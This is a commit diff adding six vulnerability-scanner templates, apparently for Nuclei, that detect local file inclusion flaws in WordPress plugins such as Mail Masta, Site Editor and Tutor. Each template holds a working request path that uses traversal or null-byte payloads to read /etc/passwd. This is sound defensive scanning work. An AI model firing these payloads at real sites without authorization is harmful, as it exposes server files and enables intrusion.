commit
aaae0a8214
|
@ -0,0 +1,19 @@
|
|||
id: wp-localize-post-lfi
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Localize My Post 1.0 - Local File Inclusion
|
||||
author: 0x240x23elu
|
||||
severity: high
|
||||
reference: https://www.exploit-db.com/exploits/45439
|
||||
tags: wordpress,wp-plugin,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
|
|
@ -0,0 +1,19 @@
|
|||
id: wp-mail-masta-lfi
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Mail Masta 1.0 - Local File Inclusion
|
||||
author: 0x240x23elu
|
||||
severity: high
|
||||
reference: https://www.exploit-db.com/exploits/40290
|
||||
tags: wordpress,wp-plugin,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
|
|
@ -0,0 +1,19 @@
|
|||
id: wp-simple-fields-lfi
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Simple Fields 0.2 - 0.3.5 LFI/RFI/RCE
|
||||
author: 0x240x23elu
|
||||
severity: high
|
||||
reference: https://packetstormsecurity.com/files/147102/WordPress-Simple-Fields-0.3.5-File-Inclusion-Remote-Code-Execution.html
|
||||
tags: wordpress,wp-plugin,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
|
|
@ -0,0 +1,19 @@
|
|||
id: wp-site-editor-lfi
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Site Editor 1.1.1 - Local File Inclusion
|
||||
author: 0x240x23elu
|
||||
severity: high
|
||||
reference: https://www.exploit-db.com/exploits/44340
|
||||
tags: wordpress,wp-plugin,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
|
|
@ -0,0 +1,19 @@
|
|||
id: wp-tutor-lfi
|
||||
|
||||
info:
|
||||
name: WordPress Plugin tutor.1.5.3 - Local File Inclusion
|
||||
author: 0x240x23elu
|
||||
severity: high
|
||||
reference: https://www.exploit-db.com/exploits/48058
|
||||
tags: wordpress,wp-plugin,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
|
|
@ -0,0 +1,19 @@
|
|||
id: wp-wechat-broadcast-lfi
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion
|
||||
author: 0x240x23elu
|
||||
severity: high
|
||||
reference: https://www.exploit-db.com/exploits/45438
|
||||
tags: wordpress,wp-plugin,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
|
Loading…
Reference in New Issue